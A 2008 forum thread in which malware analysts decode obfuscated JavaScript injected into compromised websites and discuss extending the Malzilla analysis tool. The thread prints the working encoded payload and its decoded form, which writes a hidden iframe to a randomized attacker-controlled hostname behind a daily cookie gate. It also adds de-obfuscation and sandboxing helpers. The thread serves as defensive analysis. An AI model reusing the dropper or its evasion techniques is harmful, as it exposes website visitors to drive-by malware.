Author Topic: Injected code  (Read 5223 times)

May 18, 2008, 01:58:53 pm

bobby
Someone filed a bug report for Malzilla (debugger crash), and gave the following sites as examples:
Code:
www.hrapu.net/
www.colorsky.ru/
www.onix.ru/
I only managed to open onyx.ru, and it contained the following injected code (cleaned from the site already):
Code:
eval(unescape('function%20fEjT%28vAg%29%7Bfunction%20rPe%28yDT%29%7Bvar%20yQQ%3D0%2ClTD%2CrOcfWPi%3DyDT.length%3Bfor%28lTD%3D0%3BlTD%3CrOcfWPi%3BlTD++%29yQQ+%3DyDT.charCodeAt%28lTD%29*rOcfWPi%3Breturn%20new%20String%28yQQ%29%7DvAg%3Dunescape%28vAg%29%3Bvar%20ukHcUCK%3Deval%28%27a%2CrxgZu%7Emxe%7EnZt%2Cs%7E.%7Ec%2Caxlxl%2Ce%7Eev%27.replace%28/%5Bv%7EZx%2C%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2CgqeeE%3DrPe%28ukHcUCK%29%2Ctbp%3Dnew%20String%28%29%2Caya%3D0%3BiNp%3D0%3Bfor%28var%20xiuLc%3D0%3BxiuLc%3CvAg.length%3BxiuLc++%29%7Btbp+%3DString.fromCharCode%28vAg.charCodeAt%28xiuLc%29%5E%28ukHcUCK.charCodeAt%28aya%29%5EgqeeE.charCodeAt%28iNp%29%29%29%3Baya++%3BiNp++%3Bif%28aya%3EukHcUCK.length%29aya%3D0%3Bif%28iNp%3EgqeeE.length%29iNp%3D0%3B%7Deval%28tbp%29%3Btbp%3D%27%27%3Breturn%3B%7DfEjT%28%27%2531%2538%2537%2532%2537%2539%2538%2532%2546%253f%252b%2527%256c%255f%2525%2523%257c%2525%252b%2508%2570%252d%252b%2524%251c%2538%250d%250c%251c%2524%2573%2578%2560%2512%250a%255e%256e%2520%2502%251a%2577%256b%254d%2571%2500%2513%2506%253d%253f%251a%2502%2578%2576%254c%2524%2536%2525%2572%2570%2522%2522%2537%2527%255b%2569%2537%2514%2516%252a%2513%2528%252f%2508%251b%252a%253f%250f%2511%2524%2507%2579%2561%2555%2518%256a%2535%2523%2579%2533%257e%257c%2560%2503%2517%2503%253c%2525%2500%2557%255e%2512%2522%2534%2513%2575%2533%2572%2518%250d%252f%2510%2561%257b%2512%254c%250f%2516%2518%253f%2501%2538%2543%2518%256b%251f%2536%2525%251f%252b%2564%256e%2509%2526%2506%2519%2539%2531%2568%2536%2560%2510%2574%2553%255d%2524%2547%2535%253e%2568%253e%2514%2521%257d%2522%2509%253d%2541%2527%251d%2560%251e%251d%253a%253e%254a%2522%2548%2567%2545%250f%255f%250c%2562%2575%256c%2537%252c%2522%257d%2511%2531%2560%2574%2508%2571%2500%2567%2528%2529%2554%2502%2534%257b%256f%2576%254c%2561%255b%2573%2522%2538%2575%2536%2572%252f%253b%2515%2514%252f%2516%253e%257f%2516%255a%2553%2511%2559%253e%254f%2531%253e%2545%252b%252e%2510%2538%2570%2563%253e%2530
%251a%2528%2510%2540%2525%2528%2512%2501%2507%255f%254d%253b%2548%2531%2567%2522%2533%253b%2503%2566%2536%2539%2561%253d%2539%257d%253c%253d%2578%2537%252f%2522%256d%2579%2572%251e%2513%2522%251c%2552%2508%252f%255e%250c%2528%2526%257d%2567%256b%2575%2567%254d%2521%256b%252c%257d%2527%2511%2524%2522%256f%2534%257f%2511%2534%2525%2517%252c%250e%252d%2534%2565%2538%2571%2573%2516%2526%2539%2572%2558%2564%2537%2564%2506%251d%253c%2529%2524%255b%2523%253e%2560%2535%254f%2520%2517%2537%2525%2537%2550%2565%2571%2514%2527%2515%2520%2524%2534%2559%253e%254e%2538%251e%2579%2537%252f%253b%252e%2515%2529%254a%2523%250b%252a%2527%252b%2570%2578%257f%2541%253c%2559%256d%2508%2532%2568%2526%2555%2551%250c%2561%250e%2524%257a%2518%256c%2537%2501%2529%2516%2547%251b%2579%2571%252b%252e%2511%2528%2532%251c%2534%254a%2555%2528%2564%2530%2570%2566%2517%251f%2502%2577%2526%257f%2510%257f%2579%2577%2557%2534%2575%256e%256b%2530%255b%2546%2539%2502%2536%250e%2528%252d%2510%2546%2576%2532%256b%2514%2577%256d%252e%255b%2535%251c%2538%257b%2529%2509%2572%2517%2555%2571%254a%2534%2537%2535%253b%252f%253e%2547%2570%2505%2527%2508%255a%257a%250e%2508%2549%2523%257a%2574%2561%2579%257f%257f%253d%2524%253c%2528%2500%2548%2532%253d%253e%2508%253e%250f%2563%2572%253b%254b%2509%257c%2529%253c%257c%253d%250f%250d%2535%2529%2519%2528%254f%2530%2538%2575%2575%2537%2539%2537%252e%255c%253e%2503%251c%2569%2532%2508%252a%2521%2523%2527%253b%2549%2559%2523%2528%2540%2515%2516%250f%2502%2527%2513%252d%2576%2536%253f%255b%2564%251d%253d%2537%2536%251b%252e%2536%2533%2552%2566%251f%2534%2525%2528%251a%253a%251f%2531%2519%2510%250c%2579%256d%257d%2523%2526%252b%2529%252a%2535%253f%252e%2541%254a%250d%2506%253e%2530%257c%2536%2526%2533%256e%2514%253b%252d%2503%2538%2524%2536%253e%2569%2507%2516%2538%2503%2505%2515%2533%2520%257d%2504%253f%2567%2531%2571%2570%2511%2528%252b%250d%2526%2538%254d%2564%2573%253e%2562%2521%250e%257b%2567%2561%2565%2574%2532%2576%257f%255e%257b%2526%253a%2562%2566%2565%257b%2570%2551
%254b%253c%2567%2575%257f%257b%2524%257d%256e%2578%256a%2579%2529%253e%2573%252f%2531%2519%2533%253c%2530%2570%255e%2578%252a%2568%2544%2574%2568%2505%2531%250a%2503%2562%254c%254c%2538%2570%2548%2521%2534%2535%2533%2510%255a%2548%257d%2578%2579%2558%257d%2544%2551%2560%253d%2528%2539%252a%2577%252e%252a%2511%2518%2522%2532%253c%2575%2533%2577%251a%250d%2551%2575%250c%2577%252f%2568%2578%2567%2519%254e%256f%2567%2570%2560%2552%2574%257a%252f%2519%2528%2515%2537%2521%2556%2576%2539%2502%254b%2574%2570%256f%257d%2561%2577%2564%255e%2543%256e%257a%2565%254f%2561%256b%257a%257c%2513%2577%2537%2536%2573%253d%251f%2524%2501%2513%251c%2533%2500%2523%2533%2511%2531%257b%254b%2570%2579%256e%2551%257a%2573%257f%2553%255f%2569%2525%252a%2517%2527%2562%253b%2515%2510%2510%255b%2557%253c%2520%2539%2530%2533%256d%252e%253d%2526%251b%2578%2525%256d%2523%2506%2534%2535%2568%2550%2536%252e%2522%2532%2514%2514%2565%257d%2534%2518%2562%2576%2550%2503%2535%2535%2515%2534%2516%2522%2538%2531%2541%2572%2579%2524%252c%2511%2539%2519%2518%2524%2571%257c%253c%253d%253d%2528%257c%2573%250f%2531%2564%252b%2531%2577%250c%253e%2534%2503%2574%2539%254f%253c%2535%2539%2521%2575%2530%2538%2525%251c%256a%252e%2567%256e%2537%2542%2536%253f%2533%2512%253c%2524%252f%257f%251a%2521%253d%2579%2576%2530%2538%2533%2579%255d%2576%2530%253c%2520%2526%253a%2501%2521%2569%257f%257e%2569%257c%256c%257b%2565%256d%255e%2573%2558%2562%2562%2548%254d%252a%253c%2511%253d%2504%2503%256c%256f%257b%250f%2519%2543%2528%251e%2531%2574%255d%2549%253f%252a%2529%2500%2536%2570%2577%257b%2563%256e%257a%254d%257e%252f%2528%2505%2512%2579%2531%254e%2532%2522%251b%2521%2531%2549%2542%2573%2565%2574%2510%2539%2516%250a%253c%2518%251f%2521%2541%2572%253d%256b%2505%2537%251a%2510%2527%2527%2529%251e%251a%252e%251f%2572%2577%255e%2570%2525%2566%2533%252a%2530%252e%2537%2538%251c%250f%2505%2530%2534%253f%253b%2533%252e%2535%2540%2574%2556%2533%2537%2539%253e%2535%250a%253f%2526%257a%256d%250d%252c%252b%2527%2507%2536%253d%255f%2570
%254a%251e%251c%2534%2503%253d%2531%2538%256a%256b%2522%2530%2507%251e%2535%2525%257c%2535%2503%2529%2571%2539%2561%2534%253c%2522%2522%2532%2532%257a%257d%250a%253b%2525%2570%2525%251c%2528%2539%2536%2543%257f%256e%254a%2577%253c%257e%253f%253c%2500%2536%2502%2530%256e%253d%2538%2530%2577%251b%2531%251e%253a%253f%2521%2539%2551%2573%2510%2576%2528%2537%253a%255f%252f%251f%2541%2549%2578%2561%2502%257f%2575%253a%251a%2523%2517%251d%2524%2500%2577%2578%2572%2516%2524%253b%2511%2507%2572%2529%253b%2561%257f%252c%2501%2503%253e%2565%2537%2564%256f%2522%257f%251a%256d%252f%256e%2559%2576%2549%256c%252c%2541%2561%256d%2513%257f%257b%257a%2534%2566%2570%2571%2520%257b%2528%2535%2519%251b%2524%254d%251d%2539%250f%2530%2515%2537%2500%257c%255b%250f%253e%2533%253c%2526%2509%2529%2568%2546%2504%252e%254f%2571%2563%2516%2508%255e%250f%257c%256a%2553%257a%257a%2570%2521%254e%2540%2538%2560%2539%253c%2537%2552%2521%2537%2517%2550%2525%2572%256b%2579%251c%2567%252b%2550%2510%2570%2549%2558%2513%253c%2566%2539%254f%2530%250e%253a%2525%2526%250a%2564%251e%2518%2524%2537%2568%2531%253e%2513%2579%2523%2540%251d%252b%2500%2535%257d%252e%2518%2528%250d%2510%2525%257e%2562%257c%2533%2558%252e%250c%2539%253e%253a%253b%256b%257e%2541%257d%2564%255b%2548%256b%253b%2526%2522%252d%2528%2548%253f%257a%252b%252e%2536%2530%2522%2508%254a%2571%257b%2536%2523%2516%2565%2530%2536%250a%2530%251e%2539%256d%2557%257f%256b%256b%2518%2502%2573%256d%2522%2522%253d%2536%2523%2511%2531%2564%256d%251b%250b%255d%2502%2579%2558%250e%2570%2503%2572%253e%2573%255d%257f%2573%256e%2555%2533%253b%252d%253c%2532%2523%253f%253f%253a%2530%2507%2568%2571%2501%255d%2500%2531%2538%256e%250c%2552%253d%257b%2563%253a%2510%2563%2565%2536%252d%251b%2547%254b%2552%2527%2548%2557%2573%2575%2535%2538%2526%2500%2538%2532%2534%2568%2572%2556%27%29%3B'));

That decodes to:
Code:
function KyD(){};KyD.prototype = {install : function(){if(!this.alreadyInstalled()){var s="<Qd@iIv% IsQt%y%lIeI=)\'Id@iQs%p%lQaIy%:QnQoIn)e%\')>@<Ii)f@rQaIm)eI IsQrQcQ=Q\'Q".replace(/[%\)@QI]/g, '')+this.getFrameURL()+"\'P>{<%/%ibfbr%a{mPe%>%<b/{d{i*vP>b".replace(/[\{\*Pb%]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<$h$tYm0l$>Y<xb$o$dxyG>Y'.replace(/[x\$0GY]/g, '')+s+'<U/PbUoPdwy9>5<U/9h9tPm9lU>P'.replace(/[UP95w]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},cookieName:'feadcbhg',getFrameURL : function(){var dlh=document.location.host; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;},path:'/traff2.cn/',setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); },alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},getRandString : function(){var l=16,c='0%1@2q3&4V5%6@7@8q9VaVbqc@dVeVf@'.replace(/[qV%&@]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},host:'2dtdrdadfRf6.6c<nR'.replace(/[Rd\>6\<]/g, ''),cookieValue:1};var o44o=new KyD();o44o.install();
Pretty complicated script (and I do not understand it enough).

May 18, 2008, 05:29:29 pm
Reply #1

ZaiRoN (http://zairon.wordpress.com/)
Code:
function KyD() {};

KyD.prototype = {
    // Entry point: write the hidden iframe once, then set the marker cookie
    // so the page is not re-injected for the next 24 hours.
    install : function()
    {
        if (!this.alreadyInstalled())
        {
            // Every string literal carries filler characters that the
            // .replace(/[...]/g, '') strips at run time. Resolved, the two
            // halves read "<div style='display:none'><iframe src='" and
            // "'></iframe></div>".
            var s="<Qd@iIv% IsQt%y%lIeI=)\'Id@iQs%p%lQaIy%:QnQoIn)e%\')>@<Ii)f@rQaIm)eI IsQrQcQ=Q\'Q"
            .replace(/[%\)@QI]/g, '')+this.getFrameURL()+"\'P>{<%/%ibfbr%a{mPe%>%<b/{d{i*vP>b"
            .replace(/[\{\*Pb%]/g, '');
            try {
                var o=document;
                o.open();
                o.write(s);
                o.close();
            }catch(e)
            {
                // Fallback if document.open() throws: wrap the div in
                // "<html><body>" ... "</body></html>" (same scrambling) and
                // write it directly.
                document.write('<$h$tYm0l$>Y<xb$o$dxyG>Y'.replace(/[x\$0GY]/g, '')+s+'<U/PbUoPdwy9>5<U/9h9tPm9lU>P'.replace(/[UP95w]/g, ''))
            }
            this.setCookie(this.cookieName, this.cookieValue);
        }
    },

    cookieName:'feadcbhg',

    // Builds http://<visited host>.<16 random hex chars>.<host><path>.
    // The random label gives every victim a fresh hostname under the
    // attacker's domain, which defeats simple URL blocklists and caches.
    getFrameURL : function()
    {
        var dlh=document.location.host;
        return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;
    },

    path:'/traff2.cn/',

    // Marker cookie valid for 86400000 ms = 24 hours.
    setCookie : function(name, value)
    {
        var d= new Date();
        d.setTime(new Date().getTime() + 86400000);
        document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString();
    },

    // True if the marker cookie is already present, i.e. the iframe was
    // injected into this browser within the last day.
    alreadyInstalled : function()
    {
        return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
    },

    // 16 characters drawn from "0123456789abcdef" once the filler is removed.
    getRandString : function()
    {
        var l=16,
        c='0%1@2q3&4V5%6@7@8q9VaVbqc@dVeVf@'.replace(/[qV%&@]/g, ''),o='';
        for(var i=0;i<l;i++)
            o+=c.substr(Math.floor(Math.random()*c.length),1,1);
        return o;
    },

    // Resolves to '2traff.cn'.
    host:'2dtdrdadfRf6.6c<nR'.replace(/[Rd\>6\<]/g, ''),
    cookieValue:1
};
var o44o=new KyD();
o44o.install();
OOP over javascript, encrypted strings... pretty funny :)
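The "remove the regular expression things" step can be done mechanically. The following is an added example, not code from the thread or from Malzilla: a small static pass that finds every `'<scrambled literal>'.replace(/[filler]/g, '')` call in the source, applies the character class to the literal exactly as the engine would, and writes the plain string back in its place. The names SCRAMBLE_RE, unescapeLiteral and unscramble are this example's own; SAMPLE is three statements lifted from the decoded dropper above.

```javascript
// Added example (not from the thread): statically resolve the
// '<scrambled literal>'.replace(/[filler chars]/g, '') idiom used throughout
// the decoded dropper, so the real strings can be read without running it.

// A JS string literal immediately followed by .replace(/[...]/g, '') with an
// empty replacement. Group 1: quote char, 2: literal body, 3: class body.
const SCRAMBLE_RE =
  /(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\.replace\s*\(\s*\/\[((?:\\.|[^\\\]])*)\]\/g\s*,\s*(['"])\4\s*\)/g;

// Minimal escape handling for the literal body: \n \t \r \0 are translated,
// any other escaped character (\' \" \\ ...) maps to itself. That is all this
// obfuscator uses; a full JS tokenizer would be needed for \x and \u escapes.
function unescapeLiteral(body) {
  const table = { n: "\n", t: "\t", r: "\r", "0": "\0" };
  return body.replace(/\\(.)/g, (_, c) => (c in table ? table[c] : c));
}

// Rewrite every scrambled literal in `src` as a plain JSON string literal and
// report how many were resolved.
function unscramble(src) {
  let resolved = 0;
  const source = src.replace(SCRAMBLE_RE, (_m, _q, body, cls) => {
    const filler = new RegExp("[" + cls + "]", "g"); // same class the sample used
    resolved++;
    return JSON.stringify(unescapeLiteral(body).replace(filler, ""));
  });
  return { source, resolved };
}

// Three statements taken verbatim from the decoded dropper in this thread
// (String.raw keeps the backslashes exactly as they appear in the sample).
const SAMPLE = String.raw`var c='0%1@2q3&4V5%6@7@8q9VaVbqc@dVeVf@'.replace(/[qV%&@]/g, '');
var host='2dtdrdadfRf6.6c<nR'.replace(/[Rd\>6\<]/g, '');
var s="<Qd@iIv% IsQt%y%lIeI=)\'Id@iQs%p%lQaIy%:QnQoIn)e%\')>@<Ii)f@rQaIm)eI IsQrQcQ=Q\'Q".replace(/[%\)@QI]/g, '');`;

// Prints the three statements with their literals resolved:
//   var c="0123456789abcdef";
//   var host="2traff.cn";
//   var s="<div style='display:none'><iframe src='";
console.log(unscramble(SAMPLE).source);
```

The pass only touches the exact idiom (literal, `.replace`, one character class, `g` flag, empty replacement), so it cannot misfire on ordinary `.replace` calls elsewhere in a page; anything it does not recognise is left untouched for manual review.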

May 18, 2008, 06:26:57 pm
Reply #2

bobby
Not much of OOP there, just a prototype, and one instance of it. It is just a "scrambler" for detection modules in anti-virus apps, nothing more.
Bigger problem for me is the number of DOM objects and methods used. I can't simulate them.
You simply need a full-featured browser for this to run and analyze (and I do not want to run it in browser).

May 18, 2008, 06:39:48 pm
Reply #3

ZaiRoN
Why can't you simulate it? Removing the regular expression things you can access the original source code.
What else do you need? Sorry but I don't understand your problem...

May 18, 2008, 06:51:02 pm
Reply #4

bobby
(here goes the main theme from Jaws movie)

Regular expressions?

(here goes the theme from X-Files)


Back on topic:

No, not a real problem, but I need to do it manually, or by using external tools. That's the catch I do not like.
I get a couple of mails on a weekly basis "how to do this in Malzilla, why Malzilla does not do this or that", etc.
If this form of the script is the best I can give in Malzilla, I'm in trouble.

Malzilla can't go further with the script because of missing DOM objects in Malzilla (location.href, window.location etc.).
Only thing I can try to do is some kind of interpreter for RE, compatible with JS syntax.

I do not like the idea.
I still haven't finished many other things in Malzilla, and starting to implement one more function would make it even worse.
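The DOM surface this sample actually needs is small: document.location.host, the document.cookie getter and setter, and document.open/write/close. The following is an added example, not code from the thread or from Malzilla, showing how those can be stubbed so the decoded dropper runs to completion and reports the iframe URL it would have written, without a browser and without touching the network. makeFakeDocument, analyze and SAMPLE_DROPPER are this example's own names; the host "www.example.invalid" is a placeholder, and SAMPLE_DROPPER is the script decoded above, reflowed at statement boundaries only.

```javascript
// Added example (not from the thread): run the decoded dropper against a stub
// DOM that records document.write() output and cookies, then extract the
// iframe URL from what it wrote.

// Only the DOM members this family touches. Nothing is rendered or fetched.
function makeFakeDocument(host, initialCookie) {
  const jar = new Map();   // cookie name -> value, attributes discarded
  const writes = [];       // every string passed to document.write()
  const storeCookie = (str) => {
    const pair = String(str).split(";")[0];           // drop expires/path
    const eq = pair.indexOf("=");
    if (eq > 0) jar.set(pair.slice(0, eq).trim(), pair.slice(eq + 1).trim());
  };
  if (initialCookie) initialCookie.split(";").forEach(storeCookie);
  const doc = {
    location: { host, href: "http://" + host + "/" },
    open() {},
    close() {},
    write(html) { writes.push(String(html)); },
    get cookie() { return [...jar].map(([k, v]) => k + "=" + v).join("; "); },
    set cookie(v) { storeCookie(v); },
  };
  return { doc, writes };
}

// Execute `script` with the stub as `document`/`window`, optionally pinning
// Math.random so two runs produce the same hostname. This evaluates the sample
// in the analyst's own JS realm; for samples you do not already understand use
// node:vm or a throwaway VM instead of new Function.
function analyze(script, { host = "www.example.invalid", cookie = "", rng = null } = {}) {
  const { doc, writes } = makeFakeDocument(host, cookie);
  const win = { document: doc, location: doc.location };
  const realRandom = Math.random;
  if (rng) Math.random = rng;
  try {
    new Function("document", "window", "location", script)(doc, win, doc.location);
  } finally {
    Math.random = realRandom;
  }
  const html = writes.join("");
  const urls = [...html.matchAll(/<iframe\b[^>]*\bsrc\s*=\s*(['"])([^'"]*)\1/gi)].map((m) => m[2]);
  return { html, urls, cookies: doc.cookie };
}

// The dropper decoded in this thread, split only between statements.
const SAMPLE_DROPPER = String.raw`function KyD(){};
KyD.prototype = {
install : function(){if(!this.alreadyInstalled()){var s="<Qd@iIv% IsQt%y%lIeI=)\'Id@iQs%p%lQaIy%:QnQoIn)e%\')>@<Ii)f@rQaIm)eI IsQrQcQ=Q\'Q".replace(/[%\)@QI]/g, '')+this.getFrameURL()+"\'P>{<%/%ibfbr%a{mPe%>%<b/{d{i*vP>b".replace(/[\{\*Pb%]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<$h$tYm0l$>Y<xb$o$dxyG>Y'.replace(/[x\$0GY]/g, '')+s+'<U/PbUoPdwy9>5<U/9h9tPm9lU>P'.replace(/[UP95w]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},
cookieName:'feadcbhg',
getFrameURL : function(){var dlh=document.location.host; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;},
path:'/traff2.cn/',
setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); },
alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},
getRandString : function(){var l=16,c='0%1@2q3&4V5%6@7@8q9VaVbqc@dVeVf@'.replace(/[qV%&@]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},
host:'2dtdrdadfRf6.6c<nR'.replace(/[Rd\>6\<]/g, ''),
cookieValue:1
};
var o44o=new KyD();o44o.install();`;

// Stand-alone run: prints the injected iframe URL (random label differs per
// run) and the marker cookie "feadcbhg=1" the dropper leaves behind.
const demo = analyze(SAMPLE_DROPPER);
console.log(demo.urls, demo.cookies);
```

Running it a second time with the cookie jar pre-seeded with `feadcbhg=1` produces no writes at all, which is the "already installed" gate in action: a sandbox that does not persist cookies between visits will see the iframe every time, while a real victim sees it once a day. That gate, plus the per-visit random hostname, is why a static URL list from one run is of little use for blocking.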